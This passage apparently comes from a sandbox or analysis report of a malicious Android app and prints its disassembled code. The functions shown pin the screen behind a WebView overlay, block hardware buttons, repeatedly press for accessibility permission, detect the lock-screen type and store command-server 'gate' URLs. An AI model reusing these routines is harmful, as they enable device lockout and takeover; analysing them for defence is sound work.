                        35invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        36try_end_2f: move-result v0
                        37if-eqz p4, :cond_37
                        38try_start_32:
                        39sget-object v1, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        41invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        42try_end_37: return v0
                        43catch_38: move-exception v1
                        44try_start_39: new-instance v2, Ljava/lang/StringBuilder;
                        46invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        48const-string v3, "[func] [writeConfigID] T: "
                        50invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        51move-result-object v2
                        53invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        54move-result-object v1
                        56invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        57move-result-object v1
                        59invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        60try_end_4f: if-eqz p4, :cond_37
                        61try_start_51:
                        62sget-object v1, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        64invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        65goto/16 :goto_37
                        66catch_57: move-exception v1
                        67goto/16 :goto_37
                        68catchall_59: move-exception v1
                        69if-eqz p4, :cond_61
                        71sget-object v2, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        73invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        74cond_61: throw v1
                        Cross References
                        APIs
                        • java.io.ByteArrayInputStream.<init>
                        • androidx.versionedparcelable.VersionedParcel$1.<init>
                        • java.io.ObjectInputStream.readObject
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        Strings
                        • )
                        • VersionedParcelable encountered ClassNotFoundException reading a Serializable object (name =
                        • VersionedParcelable encountered IOException reading a Serializable object (name =
                        Position Instruction Meta Information
                        1const-string v0, ")"
                        3invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readString()Ljava/lang/String;
                        4move-result-object v1
                        5if-nez v1, :cond_a
                        6const/4 v0, 0x0
                        7return-object v0
                        8cond_a:
                        9invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readByteArray()[B
                        10move-result-object v2
                        11new-instance v3, Ljava/io/ByteArrayInputStream;
                        13invoke-direct {v3, v2}, Ljava/io/ByteArrayInputStream;-><init>([B)V
                        14try_start_13: new-instance v2, Landroidx/versionedparcelable/VersionedParcel$1;
                        16invoke-direct {v2, p0, v3}, Landroidx/versionedparcelable/VersionedParcel$1;-><init>(Landroidx/versionedparcelable/VersionedParcel;Ljava/io/InputStream;)V
                        18invoke-virtual {v2}, Ljava/io/ObjectInputStream;->readObject()Ljava/lang/Object;
                        19move-result-object v2
                        20check-cast v2, Ljava/io/Serializable;
                        21try_end_1e: return-object v2
                        22catch_1f: move-exception v2
                        23new-instance v3, Ljava/lang/RuntimeException;
                        24new-instance v4, Ljava/lang/StringBuilder;
                        26invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        28const-string v5, "VersionedParcelable encountered ClassNotFoundException reading a Serializable object (name = "
                        30invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        32invoke-virtual {v4, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        34invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        36invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        37move-result-object v0
                        39invoke-direct {v3, v0, v2}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        40throw v3
                        41catch_3a: move-exception v2
                        42new-instance v3, Ljava/lang/RuntimeException;
                        43new-instance v4, Ljava/lang/StringBuilder;
                        45invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        47const-string v5, "VersionedParcelable encountered IOException reading a Serializable object (name = "
                        49invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        51invoke-virtual {v4, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        53invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        55invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        56move-result-object v0
                        58invoke-direct {v3, v0, v2}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;Ljava/lang/Throwable;)V
                        59throw v3
                        Cross References
                        APIs
                        • android.app.Activity.requestWindowFeature
                        • android.view.Window.setContentView
                        • android.view.Window.getDecorView
                        • android.graphics.Color.parseColor
                        • android.view.View.setBackgroundColor
                        • android.view.Window.findViewById
                        • android.webkit.WebView.getSettings
                        • android.webkit.WebSettings.setJavaScriptEnabled
                        • android.webkit.WebView.clearCache
                        • android.webkit.WebView.clearHistory
                        • android.webkit.WebView.loadData
                        • android.view.Window.getDecorView
                        • android.view.View.setSystemUiVisibility
                        • android.view.Window.getDecorView
                        • android.view.View.setSystemUiVisibility
                        • android.app.Activity.startLockTask
                        Strings
                        • text/html
                        • UTF-8
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v2, 0x1
                        2sput-object p2, Lcom/lib;->pinnedActivity:Landroid/app/Activity;
                        3sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        4const/16 v1, 0x1a
                        5if-lt v0, v1, :cond_12
                        6sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        7const/16 v1, 0x1d
                        8if-gt v0, v1, :cond_12
                        10invoke-virtual {p2, v2}, Landroid/app/Activity;->requestWindowFeature(I)Z
                        11cond_12:
                        12invoke-virtual {p3, p4}, Landroid/view/Window;->setContentView(I)V
                        14invoke-virtual {p3}, Landroid/view/Window;->getDecorView()Landroid/view/View;
                        15move-result-object v0
                        17invoke-static {p7}, Landroid/graphics/Color;->parseColor(Ljava/lang/String;)I
                        18move-result v1
                        20invoke-virtual {v0, v1}, Landroid/view/View;->setBackgroundColor(I)V
                        22invoke-virtual {p3, p5}, Landroid/view/Window;->findViewById(I)Landroid/view/View;
                        23move-result-object v0
                        24check-cast v0, Landroid/webkit/WebView;
                        26invoke-virtual {v0}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
                        27move-result-object v1
                        29invoke-virtual {v1, v2}, Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V
                        31invoke-virtual {v0, v2}, Landroid/webkit/WebView;->clearCache(Z)V
                        33invoke-virtual {v0}, Landroid/webkit/WebView;->clearHistory()V
                        35const-string v1, "text/html"
                        37const-string v2, "UTF-8"
                        39invoke-virtual {v0, p6, v1, v2}, Landroid/webkit/WebView;->loadData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
                        41invoke-virtual {p3}, Landroid/view/Window;->getDecorView()Landroid/view/View;
                        42move-result-object v0
                        43const/16 v1, 0x802
                        45invoke-virtual {v0, v1}, Landroid/view/View;->setSystemUiVisibility(I)V
                        47invoke-virtual {p3}, Landroid/view/Window;->getDecorView()Landroid/view/View;
                        48move-result-object v0
                        49const/16 v1, 0x1706
                        51invoke-virtual {v0, v1}, Landroid/view/View;->setSystemUiVisibility(I)V
                        53invoke-virtual {p2}, Landroid/app/Activity;->startLockTask()V
                        54return-void
                        Cross References
                        APIs
                        • java.lang.Long.longValue
                        • java.lang.Thread.sleep
                        • java.lang.Long.longValue
                        • java.lang.Thread.sleep
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [reqestPermissions] [isLibUpdating:
                        • ] ie:
                        • [func] [reqestPermissions] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const-wide/16 v2, 0x3e8
                        2if-eqz p2, :cond_e
                        3try_start_4:
                        4iget-object v0, p0, Lcom/lib;->permissionsDelay:Ljava/lang/Long;
                        6invoke-virtual {v0}, Ljava/lang/Long;->longValue()J
                        7move-result-wide v0
                        8mul-long/2addr v0, v2
                        10invoke-static {v0, v1}, Ljava/lang/Thread;->sleep(J)V
                        11goto_e:
                        12iget-object v0, p0, Lcom/lib;->a11yClassName:Ljava/lang/String;
                        14invoke-virtual {p0, p1, v0}, Lcom/lib;->isA11y(Landroid/content/Context;Ljava/lang/String;)Z
                        15move-result v0
                        16if-nez v0, :cond_4c
                        18invoke-virtual {p0, p1}, Lcom/lib;->requestA11yAlertActivity(Landroid/content/Context;)V
                        19cond_19:
                        20iget-object v0, p0, Lcom/lib;->permissionsDelay:Ljava/lang/Long;
                        22invoke-virtual {v0}, Ljava/lang/Long;->longValue()J
                        23move-result-wide v0
                        24mul-long/2addr v0, v2
                        26invoke-static {v0, v1}, Ljava/lang/Thread;->sleep(J)V
                        27try_end_23: goto/16 :goto_e
                        28catch_24: move-exception v0
                        29new-instance v1, Ljava/lang/StringBuilder;
                        31invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        33const-string v2, "[func] [reqestPermissions] [isLibUpdating: "
                        35invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        36move-result-object v1
                        37sget-boolean v2, Lcom/lib;->isLibUpdating:Z
                        39invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        40move-result-object v1
                        42const-string v2, "] ie: "
                        44invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        45move-result-object v1
                        47invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        48move-result-object v0
                        50invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        51move-result-object v0
                        53invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        54sget-boolean v0, Lcom/lib;->isLibUpdating:Z
                        55if-eqz v0, :cond_4b
                        56goto_4b: return-void
                        57try_start_4c:
                        58invoke-virtual {p0, p1}, Lcom/lib;->isOptimizationsIgnored(Landroid/content/Context;)Z
                        59move-result v0
                        60if-nez v0, :cond_19
                        62invoke-virtual {p0, p1}, Lcom/lib;->requestOptimizationsIgnored(Landroid/content/Context;)V
                        63try_end_55: goto/16 :goto_19
                        64catch_56: move-exception v0
                        65new-instance v1, Ljava/lang/StringBuilder;
                        67invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        69const-string v2, "[func] [reqestPermissions] T: "
                        71invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        72move-result-object v1
                        74invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        75move-result-object v0
                        77invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        78move-result-object v0
                        80invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        81goto/16 :goto_4b
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • android.view.KeyEvent.getKeyCode
                        • android.view.KeyEvent.keyCodeToString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • android.view.KeyEvent.getFlags
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • android.view.KeyEvent.getAction
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.view.KeyEvent.getAction
                        • android.view.KeyEvent.changeAction
                        Strings
                        • [bot] [func] [access] onKeyEvent:
                        • flag:
                        • action:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        2const/4 v1, 0x0
                        3sget-boolean v2, Lcom/lib;->blockHardwareButtons:Z
                        4if-eqz v2, :cond_4b
                        5new-instance v2, Ljava/lang/StringBuilder;
                        7invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        9const-string v3, "[bot] [func] [access] onKeyEvent: "
                        11invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        12move-result-object v2
                        14invoke-virtual {p1}, Landroid/view/KeyEvent;->getKeyCode()I
                        15move-result v3
                        17invoke-static {v3}, Landroid/view/KeyEvent;->keyCodeToString(I)Ljava/lang/String;
                        18move-result-object v3
                        20invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        21move-result-object v2
                        23const-string v3, " flag: "
                        25invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        26move-result-object v2
                        28invoke-virtual {p1}, Landroid/view/KeyEvent;->getFlags()I
                        29move-result v3
                        31invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        32move-result-object v2
                        34const-string v3, " action: "
                        36invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        37move-result-object v2
                        39invoke-virtual {p1}, Landroid/view/KeyEvent;->getAction()I
                        40move-result v3
                        42invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        43move-result-object v2
                        45invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        46move-result-object v2
                        48invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        50invoke-virtual {p1}, Landroid/view/KeyEvent;->getAction()I
                        51move-result v2
                        52if-ne v2, v0, :cond_4b
                        53const/4 v1, -0x1
                        55invoke-static {p1, v1}, Landroid/view/KeyEvent;->changeAction(Landroid/view/KeyEvent;I)Landroid/view/KeyEvent;
                        56goto_4a: return v0
                        57cond_4b: move v0, v1
                        58goto/16 :goto_4a
                        Cross References
                        APIs
                        • android.provider.Settings$Secure.getLong
                        • android.provider.Settings$Secure.getInt
                        • android.os.Environment.getDataDirectory
                        • java.io.File.getAbsolutePath
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • lockscreen.password_type
                        • lock_pattern_autolock
                        • /system/gesture.key
                        • /system/password.key
                        Position Instruction Meta Information
                        0.prologue
                        1const-wide/32 v4, 0x10000
                        2const/4 v0, 0x1
                        3const/4 v1, 0x0
                        5const-string v2, "lockscreen.password_type"
                        7invoke-static {p1, v2, v4, v5}, Landroid/provider/Settings$Secure;->getLong(Landroid/content/ContentResolver;Ljava/lang/String;J)J
                        8move-result-wide v2
                        9cmp-long v4, v2, v4
                        10if-nez v4, :cond_1a
                        12const-string v2, "lock_pattern_autolock"
                        14invoke-static {p1, v2, v1}, Landroid/provider/Settings$Secure;->getInt(Landroid/content/ContentResolver;Ljava/lang/String;I)I
                        15move-result v1
                        16if-ne v1, v0, :cond_19
                        17const/16 v0, 0xa
                        18cond_19: return v0
                        19cond_1a: const-wide/32 v4, 0x8000
                        20cmp-long v0, v2, v4
                        21if-nez v0, :cond_62
                        23invoke-static {}, Landroid/os/Environment;->getDataDirectory()Ljava/io/File;
                        24move-result-object v0
                        26invoke-virtual {v0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
                        27move-result-object v0
                        28new-instance v1, Ljava/lang/StringBuilder;
                        30invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        32invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        33move-result-object v1
                        35const-string v2, "/system/gesture.key"
                        37invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        38move-result-object v1
                        40invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        41move-result-object v1
                        43invoke-direct {p0, v1}, Lcom/lib$screenLockType;->nonEmptyFileExists(Ljava/lang/String;)Z
                        44move-result v1
                        45if-eqz v1, :cond_44
                        46const/4 v0, 0x3
                        47goto/16 :goto_19
                        48cond_44: new-instance v1, Ljava/lang/StringBuilder;
                        50invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        52invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        53move-result-object v0
                        55const-string v1, "/system/password.key"
                        57invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        58move-result-object v0
                        60invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        61move-result-object v0
                        63invoke-direct {p0, v0}, Lcom/lib$screenLockType;->nonEmptyFileExists(Ljava/lang/String;)Z
                        64move-result v0
                        65if-eqz v0, :cond_5f
                        66const/4 v0, 0x4
                        67goto/16 :goto_19
                        68cond_5f: const/16 v0, 0x9
                        69goto/16 :goto_19
                        70cond_62: const-wide/32 v4, 0x50000
                        71cmp-long v0, v2, v4
                        72if-nez v0, :cond_6c
                        73const/16 v0, 0xd
                        74goto/16 :goto_19
                        75cond_6c: const-wide/32 v4, 0x40000
                        76cmp-long v0, v2, v4
                        77if-nez v0, :cond_76
                        78const/16 v0, 0xc
                        79goto/16 :goto_19
                        80cond_76: const-wide/32 v4, 0x20000
                        81cmp-long v0, v2, v4
                        82if-nez v0, :cond_80
                        83const/16 v0, 0xb
                        84goto/16 :goto_19
                        85cond_80: move v0, v1
                        86goto/16 :goto_19
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        • java.lang.SecurityException.<init>
                        • android.os.BadParcelableException.<init>
                        • java.lang.IllegalArgumentException.<init>
                        • java.lang.NullPointerException.<init>
                        • java.lang.IllegalStateException.<init>
                        • android.os.NetworkOnMainThreadException.<init>
                        • java.lang.UnsupportedOperationException.<init>
                        Strings
                        • Unknown exception code:
                        • msg
                        Position Instruction Meta Information
                        0packed-switch p1, :pswitch_data_54
                        1pswitch_3: new-instance v0, Ljava/lang/RuntimeException;
                        2new-instance v1, Ljava/lang/StringBuilder;
                        4invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        6const-string v2, "Unknown exception code: "
                        8invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        10invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        12const-string p1, " msg "
                        14invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        16invoke-virtual {v1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        19move-result-object p1
                        21invoke-direct {v0, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        22return-object v0
                        23pswitch_22: new-instance p1, Ljava/lang/SecurityException;
                        25invoke-direct {p1, p2}, Ljava/lang/SecurityException;-><init>(Ljava/lang/String;)V
                        26return-object p1
                        27pswitch_28: new-instance p1, Landroid/os/BadParcelableException;
                        29invoke-direct {p1, p2}, Landroid/os/BadParcelableException;-><init>(Ljava/lang/String;)V
                        30return-object p1
                        31pswitch_2e: new-instance p1, Ljava/lang/IllegalArgumentException;
                        33invoke-direct {p1, p2}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        34return-object p1
                        35pswitch_34: new-instance p1, Ljava/lang/NullPointerException;
                        37invoke-direct {p1, p2}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
                        38return-object p1
                        39pswitch_3a: new-instance p1, Ljava/lang/IllegalStateException;
                        41invoke-direct {p1, p2}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        42return-object p1
                        43pswitch_40: new-instance p1, Landroid/os/NetworkOnMainThreadException;
                        45invoke-direct {p1}, Landroid/os/NetworkOnMainThreadException;-><init>()V
                        46return-object p1
                        47pswitch_46: new-instance p1, Ljava/lang/UnsupportedOperationException;
                        49invoke-direct {p1, p2}, Ljava/lang/UnsupportedOperationException;-><init>(Ljava/lang/String;)V
                        50return-object p1
                        51pswitch_4c:
                        52invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readParcelable()Landroid/os/Parcelable;
                        53move-result-object p1
                        54check-cast p1, Ljava/lang/Exception;
                        55return-object p1
                        56nop
                        Cross References
                        APIs
                        • java.util.Collection.size
                        • java.util.Collection.iterator
                        • java.util.Iterator.next
                        • java.util.Collection.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.util.Collection.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.util.Collection.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.util.Collection.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.util.Collection.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T:",
                        3"Ljava/lang/Object;",
                        4">(",
                        5"Ljava/util/Collection<",
                        6"TT;>;I)V"
                        7}
                        8.end annotation
                        10invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->setOutputField(I)V
                        11if-nez p1, :cond_a
                        12const/4 p1, -0x1
                        14invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(I)V
                        15return-void
                        16cond_a:
                        17invoke-interface {p1}, Ljava/util/Collection;->size()I
                        18move-result p2
                        20invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(I)V
                        21if-lez p2, :cond_96
                        23invoke-interface {p1}, Ljava/util/Collection;->iterator()Ljava/util/Iterator;
                        24move-result-object p2
                        26invoke-interface {p2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        27move-result-object p2
                        29invoke-direct {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->getType(Ljava/lang/Object;)I
                        30move-result p2
                        32invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(I)V
                        33const/4 v0, 0x1
                        34if-eq p2, v0, :cond_82
                        35const/4 v0, 0x2
                        36if-eq p2, v0, :cond_6e
                        37const/4 v0, 0x3
                        38if-eq p2, v0, :cond_5a
                        39const/4 v0, 0x4
                        40if-eq p2, v0, :cond_46
                        41const/4 v0, 0x5
                        42if-eq p2, v0, :cond_32
                        43goto/16 :goto_96
                        44cond_32:
                        45invoke-interface {p1}, Ljava/util/Collection;->iterator()Ljava/util/Iterator;
                        46move-result-object p1
                        47goto_36:
                        48invoke-interface {p1}, Ljava/util/Iterator;->hasNext()Z
                        49move-result p2
                        50if-eqz p2, :cond_96
                        52invoke-interface {p1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        53move-result-object p2
                        54check-cast p2, Landroid/os/IBinder;
                        56invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeStrongBinder(Landroid/os/IBinder;)V
                        57goto/16 :goto_36
                        58cond_46:
                        59invoke-interface {p1}, Ljava/util/Collection;->iterator()Ljava/util/Iterator;
                        60move-result-object p1
                        61goto_4a:
                        62invoke-interface {p1}, Ljava/util/Iterator;->hasNext()Z
                        63move-result p2
                        64if-eqz p2, :cond_96
                        66invoke-interface {p1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        67move-result-object p2
                        68check-cast p2, Ljava/lang/String;
                        70invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeString(Ljava/lang/String;)V
                        71goto/16 :goto_4a
                        72cond_5a:
                        73invoke-interface {p1}, Ljava/util/Collection;->iterator()Ljava/util/Iterator;
                        74move-result-object p1
                        75goto_5e:
                        76invoke-interface {p1}, Ljava/util/Iterator;->hasNext()Z
                        77move-result p2
                        78if-eqz p2, :cond_96
                        80invoke-interface {p1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        81move-result-object p2
                        82check-cast p2, Ljava/io/Serializable;
                        84invoke-direct {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeSerializable(Ljava/io/Serializable;)V
                        85goto/16 :goto_5e
                        86cond_6e:
                        87invoke-interface {p1}, Ljava/util/Collection;->iterator()Ljava/util/Iterator;
                        88move-result-object p1
                        89goto_72:
                        90invoke-interface {p1}, Ljava/util/Iterator;->hasNext()Z
                        91move-result p2
                        92if-eqz p2, :cond_96
                        94invoke-interface {p1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        95move-result-object p2
                        96check-cast p2, Landroid/os/Parcelable;
                        98invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeParcelable(Landroid/os/Parcelable;)V
                        99goto/16 :goto_72
                        100cond_82:
                        101invoke-interface {p1}, Ljava/util/Collection;->iterator()Ljava/util/Iterator;
                        102move-result-object p1
                        103goto_86:
                        104invoke-interface {p1}, Ljava/util/Iterator;->hasNext()Z
                        105move-result p2
                        106if-eqz p2, :cond_96
                        108invoke-interface {p1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        109move-result-object p2
                        110check-cast p2, Landroidx/versionedparcelable/VersionedParcelable;
                        112invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeVersionedParcelable(Landroidx/versionedparcelable/VersionedParcelable;)V
                        113goto/16 :goto_86
                        114goto_96: return-void
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.clear
                        • java.lang.Integer.toString
                        • android.content.SharedPreferences$Editor.putString
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • [func] [getGateUrls] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        12move-result-object v4
                        13if-eqz p4, :cond_14
                        15invoke-interface {v4}, Landroid/content/SharedPreferences$Editor;->clear()Landroid/content/SharedPreferences$Editor;
                        16cond_14: array-length v5, p3
                        17move v1, v0
                        18move v2, v0
                        19goto_17: if-ge v1, v5, :cond_28
                        20aget-object v6, p3, v1
                        21add-int/lit8 v3, v2, 0x1
                        23invoke-static {v2}, Ljava/lang/Integer;->toString(I)Ljava/lang/String;
                        24move-result-object v2
                        26invoke-interface {v4, v2, v6}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
                        27add-int/lit8 v1, v1, 0x1
                        28move v2, v3
                        29goto/16 :goto_17
                        30cond_28:
                        31invoke-interface {v4}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        32try_end_2b: move-result v0
                        33try_start_2c:
                        34sget-object v1, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        36invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        37goto_31: return v0
                        38catch_32: move-exception v1
                        39try_start_33: new-instance v2, Ljava/lang/StringBuilder;
                        41invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        43const-string v3, "[func] [getGateUrls] T: "
                        45invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        46move-result-object v2
                        48invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        49move-result-object v1
